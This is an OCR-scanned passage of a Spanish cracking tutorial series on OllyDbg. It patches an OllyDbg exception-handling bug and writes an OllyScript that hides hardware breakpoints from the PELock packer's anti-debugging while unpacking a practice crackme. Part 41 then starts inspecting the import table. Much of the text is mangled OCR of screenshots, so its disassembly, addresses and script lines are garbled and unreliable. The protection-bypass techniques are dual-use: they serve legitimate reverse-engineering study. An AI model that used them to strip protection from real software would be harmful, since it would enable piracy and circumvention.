las tildes en DEBUGGING OPTIONS-EXCEPTIONS y damos RUN. 


Don't know how to bypass command at address DO3433CB. Try to change EIP or pass exception to program. 


Obtenemos este error, mientras que en el parcheado 4, corre perfectamente que ocurre aquí veamos 
en el momento que aparece el cartel de error, lo aceptamos y miramos el LOG del OLLYDBG.exe 
normal. 


PD] ID LE Lor MIL III DY DS LEMOA REVUE LOC. UL 
Module Ci wWINDOWSssystem32antdll.dll 

50] Program entry point 

74| Access violation when writing to [7CS1CAA7I 
Integer division by zero 

EB| Access Violation when writing to [00404440007 
El Integer division by zero 

590|Access Violation when writing to [0004009907 
38) Integer division by zero 

| Access violation when writing to [B4BBBBBB 7 


ab 54| Integer division by zero 

a]5 ¿4| Access violation when sex: 
2634330B|1Illegal instruction 

Command ERRE EE v 


Vemos que la ultima excepcion antes de que salga el cartel es una ILLEGAL INSTRUCTION, 
ahora vayamos a debugging options- exceptions y quitemos la tilde de ese tipo de excepcion. 


== Debuegging options 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events — Exceptions | Trace | SFX | Strings | Addresses | 


[4 [Ignore memory access violations in KERNEL32 


Ignore [pass to program) following exceptions: 
ÍV INT3 breaks 
[Y Single-step break 


[Y Memory access violation 
AA Y Integer division by O 
[Invalid or privileged instruction 


Y ANFPU exceptions 


[4 Ignore also following custom exceptions or ranges: 
280000002 (DATATYPE MISALIGNMENT] ceptior 
CODO008F (FLO4T INEXACT RESULT] 
¿dd range | 
Delete selection | 


Undo | Cancel | 


Esa es la tilde que corresponde a esa excepcion, la quitamos y arrancamos el pelock y damos RUN. 


TIAS IS 


EXA ESTU El Hua a tema el) xr) Js) E 


AB3AS3CB AX, ERX Ilegal use of register 
a D S3 PUSH EBX 

a El. ES B1000099 

a 31 B MOU BL,S8D 

a 5 64:24 04 AND AL, 4 Superf luous prefix 
casA330S|» EB 62 HP SHORT essasano 


Para en la excepcion y si la pasamos con SHIFT +19, no hay problema para en dos oportunidades 
mas en excepciones de este tipo y arranca el pelock. 


Eso quiere decir que OLLYDBG tiene un problema cuando le pones la tilde para que pase esa 
excepcion automaticamente. 


Si solo fuera apretar SHIFT + f9 y todo se arregla no habra problema, pero alertados de este bug 
muchos programadores generaban 200 o 300 excepciones de este tipo las cuales habia que pasar 


todas a mano con SHIFT + f9 lo cual era pesado al menos. 


Ahora volvamos a colocarle la tilde y hagamos que aparezca el cartle de error nuevamente. 


(X) Don't know how to bypass command at address D0O3433CB, Try to change EIP or pass exception to program. 


Al mejor estilo cracker, lo que haremos sera crackear el OLLYDBG para arreglarle el bug, para lo 
cual abrimos un segundo OLLYDBG vacio, con el cual crackearemos al que esta detenido en el 


cartel de error. 


[c] File View Debug Plugins Options Window Help 


dx] en] vie] slo) ] + Ljejmtiwjnjc[/jk/B]r/- Js] 53] 


En este OLLYDBG vacio iremos a FILE -ATTACH para atachear y debuggear al otro OLLYDBG 


que este detenido en el cartel de error. 


[2 Open 


View Debug  Plugir 


Exit Y 


1 MiiMarmirnramber amo Cab 


Select process to attach 


DODOOO 


aaa 


9-53| googleta| Google Talk 
Ad-llatch|Process filter. Shows all 
td Act ive downloads 


A 


CidArchivos de programarGooglerGoogle 
Co MWINDOWSSystem32asuchost. exe 
¿»Archivos de programaArchivos comun 
¿MArchivos programasSunbelt Softwa 
¿»Archivos programa“OpenOff ice. org 
¿»Archivos programarArchivos comun 
¿»Archivos programa rkKeyFocusKFWSs 
¿»Archivos programa Opera Opera. ex 
¿»Archivos programaAntiVir Person 
C:Documents and Settings*Ricardo“Escr 
CidArchivos de programa“GooglerGoogle 
¿»Archivos de programa“GooglewGoogle 
¿»Archivos de programa“GooglewGoogle 
¿»Archivos de programarSunbelt Softwa 
¿Mrchivos de programa“AntiVir Person 


sArchivos de programa“GooglewGoogle 


e 
c 
E 
TAO FINALSOLLWDBG. EXE 
c 
e 


] CE SARCHIV" 1SLAVASOFTSAD-AWA” 13 Ad-hlatch 7 
¿MARCHIU” 1 FREEDO” 15£dm. exe ds 


Cancel 


En la ventana que se abre buscamos el proceso OLLYDBG.exe cuya ventana o WINDOW tiene el 


eror como muestra alli, y apretamos attach. 


OllyDbg - OLLYDBG.EXE - [CPU - thread 0000034, module ntdll] 


[e] File View Debug Plugins Options “Window Help 


EFE en] vis] sd] 1] + LjelmitiwjH/c]7] 


MOV EDI,EDI 


Alli paro ahora damos RUN 


Ahora miraremos el mapa de memoria. 


DI LS Sr paa ” 


00360000) 000010008 Map |Ru RU 
D03C0000' DOBBZ000 Map |R R 

00300000 | 00001000 Priv| Ri RU 
DO3E0000| 00001000 Priv| Ri RU 
DO3F0000' 00BB400a Priv| Ru RU 
004900009 00091006: OLLYDBG PE header | ImagíR RUE 
00461000) O00BAFOGO| OLLVDEBG | .text code Imag|R RUE 
00480000 00905B096' OLLYDBG | .data data Imag R RUE 
D0S0ED00| 000B1000/| OLLYDEG |.tls Imag|R RUE 
BOS9CO0Ó6 | 000B1006| OLLYDEBG | .rdat Imag|R RUE 
B0590000' 000982000 / OLLYDBG |. id imports Imag|R RUE 
DOSOFO00| 00020006 | OLLYDEG |.e exports Imag|R RUE 
00511000) 00036000/ OLLVDBG |. resources |Imag|R RUE 
00547000| 0904C09B| OLLYDBG relocations| Imag|R RUE 
0560000 00010000 Priv| Ri Ru 
00572000) 000010008 Priv| Ri RU 
00575000| 000900006 Priv| Ru RU 
la==1915151J85]515151351515) Priv| Ru RU 
B0SASO06| 00BB10Da Privi Ru RU 


Por supuesto la victima es el otro OLLYDBG cuyas secciones vemos alli, lo que haremos sera 
colocar un Bp MessageBoxA 


Soda Bp MessageBoxA 5] 


Breakooint at USER32.77D50530 


MOU EDI,EDI 

PUSH_EBP 

MOU EBP,ESP 

CMP DWORD _PTR_DS:[77D704EC],0 


JE SHORT 77D5051C USER32.77D59510 
MOU EAX, DWORD PTR FS:[18] 


PUSH O 
PUSH DWORD _PTR DS: [EAX+24] 
PUSH 77D70B24 


TEST _EAX,EAX 


a ECO4D?7? 1 
64:A1 18000000 


kernel32. Inter lockedCompareExchange 
USER32. 77050510 


FF7S 08 

=> 20000000 USER32.MessageBoxExA 
Cc2 1600 
90 


90 


Pero ese no es tan importante solo nos sirve como guia para poner el BP en el RET de la api 
MessageBoxaA, y al aceptar el error, parara en el RET al volver de dicho cartel. 


004017AE 


Nur 


PUSH_EBP 
MOU EBP,ESP 


2BEC 
3104 FCF9FFFI ADD ESP,-604 
2D45 ac 


50 
3B55 08 
52 


LEA EAX, DWORD PTR SS: [EBP+C] 
PUSH_EAK 
mou ani PTR SS: [EBP+8] 


PUSH 
3D8D FCFSFFFI LEA ECX, DWORD PTR SS: [EBP-604] 
PUSH ECXx 


Es as 
38085 FCF9FFFI 
2B15 

6s 10200000 
63 10844800 
50 

52 

Es BDB40590 


5A 4 

ES AFDFF 
5 

5D 


O 


ADD ESP, 6c 

LEA EAX, DWORD PTR SS: [EBP-604] 
MOU EDX, DWORD PTR DS: [403B7C] 
PUSH 2610 

PUSH 4BB410 


¡Quner 
Hescaoebond 
par (91515 1515151515] 
re 


Argl 
OLLYOBG. 664A6054 


MB_0K¡MB_ ICONHAND:MB_TASKMODAL 
"Error” 


=> BBEDO1A2 ("Ol lyDba -— UnPackMe_PELock 


Alli vemos cuando retornamos al programa de la api, al apretar f7. 


(Xx) Don't know how to bypass command at address DO3433CB, Try to change EIP or pass exception to program. 


Si buscamos entre las strings del OLLYDBG 


TI II A Ra 


Find references to 

Vier 

Copy to executable 
Analysis 

Dump debugged process 
PolyMorphic BreakPoint 


Si recordamos el texto del cartel decia lo que vemos arriba. 


EIC 


Name (label) in current module Ctrl 
Name in all modules 


Disassemb ly 


. , 
DWORD _PTR DS: [400290], 460144 
EDx, 4B0158 
EDx, 4B015B 
EDx, 4B015E 
DWORD PTR DS: [4002907], 4B0161 
DWORD _PTR DS: [400290], 4B0183 
EDx, 4B01A0 
EDXx. 4B01A3 


Appearance 


Command 


Sequence of commands 


Constant 
Binary string 


Ctrl 
Ctrl 


Ctrl 


All intermodular calls 


All commands 
All sequences 
All constants 
All switches 
All referenced 


text strings 


Text string 


ASCII "Too 
ASCII "RA" 
ASCII "RB” 
ASCIT- ST” 
ASCII: “EPUES 
ASCII "Clos 1n! 
ASCII "XMMWORIÍ 
ASCII "ElIP” 


i 
Lor 


y alli buscamos la palabra bypass que esta en el mensaje. 


deltinod ta 


pan 


L.! 


Follow ¡ in Disassembler 


Search next A 


B0435078| PUSH 4B6BA5 


Bees PUSH 4B6DEC 
B0435273| PUSH 4B6E64 

B0435382| PUSH 4B6EC6 
B0435394| PUSH 4B6ED7 


Da43s3nS PUSH 4B6EED 
MADEJES| DIICU ADEEAD 


Vemos que esa es la string correcta, hagamos doble click para ir al lugar donde esta la misma en el 


listado. 


HDD 
DO 


DO 


DOS: 
DOE 
ASS AS 
y 


DD 
ODO 


IDA 


Y 


Del 


1515] 


75 31 
3837D FC Bu 
74 10 


v| EB E 
53 


ES 27p10000 
[lo] 


68 EC60D4B90 
Es AFED6B100 
3304 08 


68 64654200 
Es 9FEDG100 
3304 08 
ES 1F63FEFF 
a38308_FF 
v| E2 E7000090 


ASCII "Don't know how to step command at address XZ08%. Try to run, 


change EIP or pass exception to aro gran: EBElote: You 


ASCII "Don"t know how to step command at address X%08%. Try to change ElP or pass exception to prog; 


ASCII "reset actual breakpoint, 


ASCII "Debugged program set single step flag (bit T in EFL). 
ASCII "Don't know how to continue because memory at address X08X is not readable. Try to change EIP or pass exception 
ASCII "Don't know how to bypass breakpoint at address 208%. Try to delete breakpoint, change EIP or iria ¡SHception to 


1 E t know how to step command at_address 08% correct l: 


ASCII "Don"t know how to bypass command at address 408%. Try to change ElP or pass exception to progra 


ASCII "OpenProcessToken'” 
ASCII "LookupPrivilegeValuen” 


ASCII "AdiustTokenPrivileges” 
ASPTT "aan ie lanar S 


CMP DWORD PTR_SS: [EBP+14],0 
CMP DWORD PTR_DS: [4081307,0 
CMP_ DWORD _PTR_SS: [EBP-4],0 


PUSH EBX 
PUSH 4B6DEC Do 


ADD ESP,S 


PUSH EBX 
PUSH 4B6E64 


DD ESP,S 
OR_EAX, FEFFFFFF 
MOU_EDX, DWORD PTR SS: CEBP-24] 


e 


OLLYOBG. 00435374 
OLLYOBG. 0043528D 
OLLYDBG. 96043528D 
Lt BO435272 


Aral = MB4B6DEC ASCII ”Don”t 
EPrOr 


to, 00435230 


Ari = MB4B6E64 ASCII "Don”t 
ENHOR 


OLLYDBG. 6041854 
OLLYDBG. 00435374 


>8B55 DC 
F6s2_ 10630001 TEST BYTE PTR_DS:[EDX+31D1,1 


Vemos que cualquiera de esos JNZ evita que salga el cartel de error podriamos cambialo por JMP y 
tendriamos nuestro programa parcheado, la guardar los cambios definituvos en memoria con COPY 
TO EXECUTABLE y SAVE FILE. 


Abramos el parcheado 4 en OLLYDBG para mirarlo y veamos esta misma zona a ver como es. 


DODOD 
DD 


Y 


3308_FF 

E9 27010000 
337D_14 00 
75 3A 

333D 230214000 1 
75 31 
337D_FC 00 
EB 2B 


68 EC6D4B00 
Es AFED6100 
3304 08 

EB BE 

53 

68 64654200 
Es 9FEDG100 
3304 08 

Es _1F6SFEFF 
3308_FF 

E9 E7000B0a 
3B55 DC 

F6s2 10630000 1 
YS 43 


OR_EAX,FFFFFFFF 
CMP DWORD PTR_SS: [EBP+14],0 
CMP DWORD PTR_ DS: [4031307,50 
CMP DWORD PTR_ SS: [EBP-4],0 


- 
pm 
107) 
== 
m 
[11] 
x 


PUSH 4B6DEC 


TED 
CHO 
DO 
an 

m 
mI cio 
DO” 
x 

00 


PUSH 4B6E64 


D 
o 
o 
m 
un 
=D 
co 


OR_EAX,FFFFFFFF 


MOU_EDx, DWORD PTR SS: [EBP-24] 
TEST BYTE PTR DS:[EDX+31D1,1 


Parchead. 6041B5A4 
Parchead. 00435374 
Parchead. 0043528D 
Parchead. 6043528D 
Parchead. 60435280 


ASCII "Don"t know 
Parchead._Error 


Parchead. 66435280 


ASCII "Don*t know 
Parchead._Error 


Parchead. 00418594 
Parchead. 66435374 


Parchead. 664352E1 


how to bypass b 


how to bypass 


Vemos que en este directamente en vez de parchear los saltos que de cualquier manera nos llevan a 
saltear el cartel, lo que hice en su momento, fue cambiar el ultimo salto justo antes del cartel y 
cambiarlo a JMP 43528d, por si acaso salte de algun otro lugar siempre evite el cartel por cualquier 


camino, 


Bueno esto es todo el secreto del parcheado 4 y porque no tiene el bug de ILLEGAL 
INSTRUCTION como el OLLYDBG.exe normal, asi que pueden parchearlo por ustedes mismos o 
usar el que esta dentro de la leccion 39, en la correcion fue agregado dentro tambien el 
PARCHEADO 4. 


La segunda parte de este tutorial sera hacer un simple script, para lo cual usaremos el 
OLLYSCRIPT 0.92 que adjunto a este tutorial, y pondremos la dll en la carpeta plugins del 
OLLYDBG. 


Ds a as, 
3 Atrás ($) Dd y Búsqueda > Carpetas 


acción (5) C:PLUGINS 


Tareas de archivo y carpeta HideOD. dll CmdBar. dll 
a Crear nueva carpeta 
DA) Publicar esta carpeta en Web CmdBar.ini ] 

a Opciones de configuración PuntosMagicos. dll 
[2 Compartir esta carpeta 1 K8 


+BP-OLLY. dll.exe +BP-OLL*. dll 


Otros sitios 


ss Disco local (C:) 
(ES Mis documentos 


APArAra 


OllyDump. dll olly_polymorphic_breakpoint, dll 
(E Documentos compartidos 
Y mpPc 
€g Mis sitios de red OllyScript. dll 


Detalles 


Ahora abrimos el Parcheado 4 


Options Window 


1 HideOD > 

2 CommandBar » 

3 Puntos Mágicos » 

4 +BP-OLLY > 

5 OllyDump » 

6 PolyMorphic BreakPoint  » 
Run script... 
Abort 
Pause 
Resume 
Step 
About 


Vemos que aparece el PLUGIN 


Ahora abro el pelock que estabamos estudiando, el tema sera hacer un minisript para que funcionen 
los hardware bpx y que no sean detectados por el packer. 


Sera un sencillo script veremos los comandos que por supuesto los consultamos en el README del 
plugin OLLYSCRIPT. 


La idea es la siguiente como vimos en la parte anterior cada vez que para en 
KiUserExceptionDispatcher estamos justo antes de que el sistema operativo llegue al manejador de 
excepciones donde sabemos que pueden ser detectador los HBP y borrados, asi que la idea es hacer 
un script que cada vez que el programa pare en el Bp KiUserExceptionDispatcher, borre el HBP y 
cuando llegue al CALL a ZwContinue lo restaure. 


lmvj 44) 2] PJ 00J "o31 93) $e dol 89) 95 10000 VO 009 US PO AS O FO FE O E E 


5 8B4C24 04 MOU ECX, DWORD PTR SS: [ESP+4] 
. a MOU EBX, DWORD PTR SS: [ESP] 


ntdll.7C9477C1 
ntdll.7C91EBBA 


53 
Es Cracozon 
BACO 


BB 


1 
ES 11EBFFFF ntdll.ZwContinue 
E 4B 


ntdll.7C91EB15 


lo 


Como es nuestro primer script y para no complicarlo demasiado, los BP en estas direcciones tanto 

en KiUserExceptionDispatcher y en el call que va a ZwContinue los colocaremos a mano pues ya 
sabemos ubicarlos, facilmente y logicamente se pueden colocar sin problemas con el mismo script, 
pero eso ya lo veremos mas adelante no quiero complicarlo de mas, asi que la idea es ir y colocar a 
mano un BP 

KiUserExceptionDispatcher y en el CALL que va a ZwContinue como vemos en la imagen. 


[la] 


Ahora que ya pusimos a mano empezaremos el script el cual normalmente se comienza con un 
etiqueta arbitraria en mi caso use inicio: 


inicio: 


esto se coloca para que si necesitamos saltar al principio del script facilmente con un Jmp inicio esta 
solucionado, luego de inicio viene el Hardware Breakpoint que queremos colocar por ejemplo. 


bphws 12ffc4, "r" 

bphws es el comando que coloca un hardware breakpoint en la direccion en este caso 12ffc4, y entre 
comillas la r significa on access o read que es lo mismo, si fuera w seria on write y si fuera x seria 
on execution. 

inicio: 

bphws 12ffc4, ''r" 


trabajo: 


Luego de la colocacion del o los hardware bpx que quiero usar, pongo otra etiqueta llamada trabajo 
por si quiero retornar luego de la colocacion de los HBP. 


inicio: 
bphws 12ffc4, "'r"' 
trabajo: 


eob pirulo 
run 


vemos alli el comando eob, lo que hace el mismo es que cada vez que el OLLYDBG detecte una 
excepcion o breakpoint, pasa la ejecucion a la etiqueta que esta al lado del comando en este caso 
eob pirulo, significa que cuando el programa pare en una excepcion o breakpoint seguira corriendo 
desde la etiqueta pirulo, y luego doy RUN con el comando llamado run. 


Este es la parte principal, alli cuando ejecute el script el OLLYDBG comenzara a correr la victima, 
debemos preparar que vamos a hacer cuando detecte una excepcion o BREAKPOINT , para ello 
escribiremos la etiqueta pirulo: 


pirulo: 

cmp eip, 7c9leaec 
je quitar 

cmp eip, 7c91eb03 
je restaurar 

jmp final 


en mi maquina 7c9leaec es la direccion de KiUserExceptionDispatcher o sea cuando pare en ese 
BP, el eip de mi maquina sera 7c9leaec, por lo tanto compruebo que estoy realmente alli y salto a 
la etiqueta quitar, para borrar los HBP. 

Luego hay otra comparacion para cuando pare por el otro BP que esta en CONTINUE y cuando 
detecte que el programa paro por ese BP, vaya a la etiqueta restaurar, para poner nuevamente los 
HBP. 


Luego solo me queda 

quitar: 

bphwc 12ffc4 

jmp trabajo 

Cuando salto a quitar para borrar los HBP el comando bphwc sirve para borrar los mismos y luego 
de borrarlos salto a trabajo, para que vuelva a ejecutarse todo y a correr el programa pero sin 
colocar los HBP. 


La otra etiqueta es restaurar que s eactiva en el Call a ZwContinue 


restaurar: 
jmp inicio 


que directamente salta al inicio donde se vuelven a colocar los HBP y se reinicia el ciclo. 


Por supuesto debemos tener una posibilidad de parar el programa cuando OLLYDBG pare por 
nuestro HBP, en ese caso es esta parte final. 


Como cuando ejecuta eob para tambien por cualquier breakpoint o excepcion, cuando para por 
nuestro HBP, tambien ira a pirulo y como no es ninguno de los BP que colocamos a mano seguira 
hasta la etiqueta final: 


pirulo: 

cmp eip, 7c9leaec 
je quitar 

cmp eip, 7c91eb03 
je restaurar 

jmp final 


alli en final: 


final: 

MSGYN "Continuar?" 
cmp $RESULT,1 

je inicio 

ret 


MSGYN es que hacemos aparecer un messagebox con la opcion continuar, para que veamos si nos 
gusta el lugar donde paro o queremos que siga corriendo hasta la proxima vez que pare por el HBP. 
Si apretamos YES en la variable reservada $RESULT habra un 1, y si apretamos no un 0, por lo 
cual cuando queremos que continue, al apretar YES el script compara $RESULT con 1 y vuelve al 
inicio a continuar trabajando, si no es 1 va al ret donde termina y para el script y queda el 
OLLYDBG parado donde nosotros queriamos. 

El script completo es (recordar poner manualmente los BP en Bp KiUserExceptionDispatcher y el 
CALL que va a ZwContinue) 


Er 
an 
— 


Abajo lo vemos mejor con unas flechas explicativas, al inicio ponemos los HB y corremos el 
programa dejando la trampa lista que cuando encuente BP o excepcion salte a pirulo. 
A pirulo solo saltara cuando hay BP o excepcion y en ese momento tenemos que testear las distintas 
posibildades, de que sea por los BP que colocamos a mano, o por el HE o por cualquier excepcion. 
Testeando el eip, podemos determinar si se disparo el salto a pirulo, por el BP de 
KiUserExceptionDispatcher con lo cual si se verifica, salta a quitar los HBP para que no sean 
detectados en el manejador de excepciones, y retorna a trabajo donde vuelve a correr el programa 
sin HE. 
Luego en el BP del CALL a ZwContinue saltara nuevamente a pirulo y ahora comparando eip, nos 
llevara a restaurar ya que en este momento ya paso el manejador de excepciones y los puedo 
volover a colocar, y luego para cualquier otro BP o excepcion o si para por el HE, salta a final 
donde decido si parar o continuar, si paro va al ret si continuo va a inicio. 

inicio: 

bphws 12ffc4, "r" 

trabajo: 

eob pirulo 


Ea al encontrar excepcion o bp k 


pirulo: 

cmp eip, 7c9leaec 

je quitar 

cmp eip, 7c91eb03 si estamos en 

Je re e ar KiUserExceptionDispatcher 
m 1n 

jmp borramos los HE 

quitar: 

bphwc 12ffc4 


jmp trabajo 7 . 
si estamos en ZWcontinue 


restaurar: restauramos 
jmp inicio 


final: 
MSGYN "Continuar?" 


cmp $SRESULT,1 ici , 
de únicio aqui decidimos si paramos o 


ret no 


Probaremos el script lo guardo en una fila de texto y arranco el pelock, luego pongo manualmente 
los 2 BP y voy al menu del plugin 


LJ rue NIN LOLI PG IS e ES YM II mes 


CA» R SS: [ESP+4 
MOU EBX, DWORD PTR SS: [ESP] 
PUSH ECx 
PUSH EBXx 
OR AL, AL 


POP EBX 
POP ECX 


PUSH B 
PUSH ECX 


ntdll.7Cc9477C1 
ntdll.7C91EBGA 


[la] 


1 
11EBFFFF ntdll.Z¿wContinue 
B 4B 


ntdll.7C91EB1S 


POP EBX 


a. =... m 


Buscar en | (4 Escritorio +! 
e (3 mis documentos 
a “dm pc 


Documentos — (Amis sitios de red 
_ tecientes  [(ba-kwindfx 


(3 ES)ESCRITORIO 
[5 ollyScripts092 


Escritorio 


3) SendTo 
(20 Tipo: Documento de texto 


S Fecha de modificación: 07/04/2006 4:46 
Mis documentos Tamaño: 273 bytes 


Mi PC 
a. Nombre: lHBP. txt y 
Mis sitios de red Tipo: [0 Scripts y] Cancelar | 


[Abrir como archivo de sólo lectura 


Veo que para por el HBP, igual apreto YES para que siga 


Command Bp GelModuleHandleA y] | Ñ 


| Hardware breakpoint 1 at OO34087B - ElP points to next instruction 


Teddy Rogers / SnD Team 2005 


This is a PELock 1,06 UnPackME 
(Code Redirection) 


If you unpack it write a tutorial :) 


Co) 


Veo que el programa corrio perfectamente y veo en la ventana dehardware breakpoints 


Hardware breakpoints 


H Base Size  Stopon 


1 [O00t2FFC4 [1 [Access [ Folw1] Delete | 
A | enana ¡pese 
a A 
y PATTI roma | ¡Dette | 

oK | 


rm 


1] 


El mismo se encuentra colocado por lo cual el programa corre con HBP y para en los mismos sin 
ningun problema, que era lo que queriamos lograr, jeje. 


En la parte 41 y despues de esta introduccion que nos ayudara seguiremos haciendo scripts y 
repararemos el pelock completamente. 


Hasta la parte 41 
Ricardo Narvaja 
07/04/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 41 


Continuaremos con el dsempacado del pelock que tenemos pendiente, ahora trabajaremos con la 
TAT para lo cual veremos si existe algun salto magico o similar. 


Para ello lleguemos nuevamente hasta el oep. 


e ea] visi $ 


- E9 SAD66590 
Ba33 
D238A_D4891534 
E6 45 

BOSB CSsiE1FF 
Boa 

B039 BO3BE645 
Baci 


dul + 1]e[mt[wn/c],/k]8/r]-]s] E 


ADD BYTE PTR DS: [EBx1,DH 
ROR BYTE PTR DS: [EDX+341589D4],CL 
OUT 45,AL 


ADD BYTE PTR DS: CEBX+FFE181C8], CL 
ADD BYTE PTR DS: [EAX], AL 

ADD BYTE PTR DS: [ECX+45E£6300D7, CL 
ADD CL,AL 


1/0 command 


=D 


ES 294210000 
narra 


TPOT Fi PO 


a El 68 UnPackMe.004271FF 
a B3CA ADD ECX, EDx 

Ba 290D 2CE64506 [|MOU DWORD PTR DS: [45E62C],ECXx 

a C1E3 10 SHR EAX, 10 

B AS 28564500 MOU DWORD PTR DS: [45E628],EAX 

a UnPackMe. 00429340 


Bueno ahi llegamos al falso OEP, busquemos llamadas a las apis, miremos con click derecho 
SEARCH FOR- ALL INTERMODULAR CALLS. 


Jerrso] 746€6560] 


Name (label) in current module Ctrl+MW 


Search for » 
Find references to » Name in all modules 
View » 
Command Ctri4F 
Copy to executable » 
Ñ Sequence of commands Ctrl+s 
Analysis » 
Constant 
Dump debuaged process Bl cua 
inary strin Y 
PolyMorphic BreakPoint » Y 9 
All intermodular calls 
Appearance 
All commands Ñ 
oí All sequences 
al a 
66437D3D CALL DWORD PTR DS: [460038] USERS: GetMessageTime 
606437046 | CALL DWORD PTR DS: [466D03C] USERSZ., GetMessagePos 
60437EDD' CALL M6437B9F UnPackhe. 1BB437B9F 
B0437FBA| CALL DWORD PTR DS: [460D2C] U GetPropA 
B0437F66 | CALL DWORD PTR DS: [460030] USE Cal lWindowProcA 
B0437F34 CALL DWORD PTR DS: [460050] U SetlWindowLon <A 
B0437F8C| CALL DWORD PTR DS: [460034] L RemovePropA 
6B0437FEG| CALL DWORD PTR DS: [46003067 us Cal lWindowProcA 
6043385838D| CALL DWORD PTR DS: [460E78] us SendhMessageA 
604338906: CALL DWORD PTR DS: [4600207 us GetLastAct ¡vePopup 
B043380E2 CALL DWORD PTR DS: [460024] us GetForegroun du) indow 
664338100 | CALL DWORD PTR DS: [460028] us SetForegroundWWindqw 
B04381BA CALL OWORD PTR DS: [460014] USER Cal |NextHookEx 
604338248 CALL M6437B9F UnPackMe. 1BB437B9F 
60438257 CALL DWORD PTR DS: [460054] USERS2. GetWindowLon yA 
6043382738) CALL DWORD PTR DS: [4600507 L SetlindowLon <A 
6B0433828B | CALL DWORD PTR DS: [460050] U SetlindowLon <A 
6B043382A8| CALL DWORD PTR DS: [460054] U GetWindowLon<aA 
66433828D| CALL DWORD PTR DS: [460018] U SetPropA 
60438205 | CALL DWORD PTR DS: [460020] U GetPropA 
6B043382E4 CALL DWORD PTR DS: [4600507 LU SetWindowLon <A 
6B04382F3 CALL DWORD PTR DS: [460014] U Cal |NextHookEx 
604338309 CALL DWORD PTR DS: [466D1C] us Unhookw indowsHook Ex 
B043833E CALL DWORD PTR DS: [468ACCI ke 32,.GetCurrentThreadId 
B043334E CALL DWORD PTR DS: [460010] Úsi SetllindowsHookExA 
B643838D| CALL DWORD PTR DS: [460010] USER UnhookWindowsHookEx 
60438447 | CALL DWORD PTR DS: [46006C] USER CreatellindowExA 
604338644 CALL DWORD PTR DS: [460E78] L : SendMessageA 
606433681 | CALL DWORD PTR DS: [460050] U : SetlWindowLon <A 
0843860C| CALL DWORD PTR DS: [460008] JSERSO:Destroyllindow_ 


Alli vemos unas cuantas elijamos una y hagamos doble click en ella para verla en el listado. 


IU vit $31 8] + LJEJMTIW HC] 1/K]B]R]-+5] 


IEXES 


C2 6Cob 


56 
68 38DC24100 
B9 70E245090 


FF1S 30004600 
BFEFCS 


NNAr 


PUSH ESI 
PUSH_41C28D 
MOU ECX, 45E270 


MOUSX ECX, AX 


ATA NF.TFOTiIAnT1 Fo 


ES ABESOBBn UnPackMe. 004460DB 
SBF0 MOU ESI,EAX ; 
FF1S 33004600 USER32. GetMessageT ¡me 
8946 44 MOV DWORD_PTR DS: [ESI+447],EAX 


USER32. GetMessagePos 


Esto quiere decir que el call a la api toma valores de 460d38 que es una entrada de la IAT, 


miremosla en el DUMP. 


( 


Lo Ds Ls Lo Ls Ls Ls os o Ln o | 
PIP) A A LU 00 PA ir to po 
E. | 
a] 


xp u 
lla 


eb01 ¡MmP 


L 
+tAaiB-=[7 


y 
| 
4D! 
+ 


Dtwó- Dw 
F w+ LE 
(ADWy=EWw 
.10w]150w 
FREvÓ . EW 
DOEW3Ó EW 
=0EW““EEWw 
ELIWA+EW 
“OIWtIEW 
+I0EWDSEw 

_"EWs "EW 

EW? TE 
(-EWB1Dw 
«10 iTEw 
"nyEwa-EW 
ITEWM+ EW 
+-EWEMEW 
3-Ew LirOw 
+ 1004 bw 
.GiwadEw 


AAA 


26+A; 
ERE 


Daba 
DOS 


o) 
DD 


. 4.» 


DOS 
DODO 


DE 
DO 


Alli vemos el inicio de la IAT en 460818 ya que mas arriba si marco cualquier entrada y hago FIND 
REFERENCES no hay referencias, ni van a ningun seccion code de dlls, lamentablemente toda la 
TAT esta correcta por lo cual parece que no necesitaremos buscar el salto magico, (buaa con lo que 


habia preparado el script de la parte anterior, pero bueno ya habra otras ocasiones), busquemos el 
final de la IAT. 


Alli tenemos el final de la IAT 


Address il 


¡DO 


dol 


B8]NwE +Zw 
3,7184 -|pt 


A; UNduá=> 
wi da 


hasta la parte grisada no hay problema hay referencias, la duda esta en la entrada de 46024, para la 
cual no hay referencias, sera una entrada de la IAT? Hasta donde tengo marcado con gris son 
entradas que van a la seccion code de ole32.dll 


7749C000| 000669908 | comct 1_1| .reloc relocations Imag R RWE 
77480000 | 00901000 | ole32 PE header Imag|R RWE 
77481000 0011F000 ole32 «text code, import: Imag R RWE 
77500000 | 000606998 | ole32 «Orpc code Imag|R RWE 
77506000 | 00907000 | ole32 «data data Imag|R RWE 
77500000 | 00062000 | ole32 ¿«PSro resources Imag|R RWE 
7750F000| BOBBEGAA| olesz2 .reloc relocations! Imag|R RWE 


Ahora vemos que haciendo click derecho en algunas de las entradas que van a esa dll, tampoco hay 
referencias que ocurre aquí. 


qa 20) 9 $34 9) + E) M0 09 M0 3) 1 Y E) 3) 0 9 


BYTE PTR DS: [EBxX1,DH 
BYTE PTR DS: [EDX+341589D4],CL 


45, AL 

BYTE PTR DS: [EBX+FFE1S108],CL 
ADD BYTE PTR DS: [EAXI, AL 

DE DS: [ECX+45E£6300D1, CL 


BB33 
D238A_D4891534 
E6 45 

BOSB CSs1E1FF 
Boa 

B039 BO3BE645 
Baci 


1/0 command 


ae ADO 

an v El 08 LOOPDE SHORT 604271FF UnPackMe. B04271FF 
a B3CA ADD ECx,E 

a 39D 20E64508 | MOU DUORD. PTR DS: [45E62C0],ECX 


Y 


C1EsS 16 SHR EAXx, 10 
A3 28564500 MOU DWORD PTR DS: [45E628],EAX 


ES 94210000 CALL MB4293A0 
35c0 TEST EAX,EAX 
> 750 BA JNZ SHORT 0042721A 
6A 10 PUSH 10 
Es 49010000 CALL _MM427360 
8304 M4 ADD ESP, 4 
ES nmi2canan PO CARASMICA 


UnPackMe. 00429348 
UnPackMe. 00427214 
UnPackMe. 00427360 


Un Dante Ma (arAA 204 Cía 


Si volvemos a mirar el OEP vemos un JMP raro que en mi maquina salta a una seccion en AxxxxxX 
que no pertenece a las secciones del exe (en su maquina puede estar en otra direccion), si miramos 
el mapa de memoria. 


DUIIAHUIUIDO | UY LINA TIitv] rn ru 
0040000 UnPackMe PE header Imag R RWE 
00401000 69) UnPackMe| .teddy code Imag R RWE 
0044B009 0099C006 UnPackMe .teddy Imag R RWE 
00457009 00099009 UnPackMe .teddy Imag R RWE 
00460009 00093009 UnPackMe .teddy Imag R RWE 
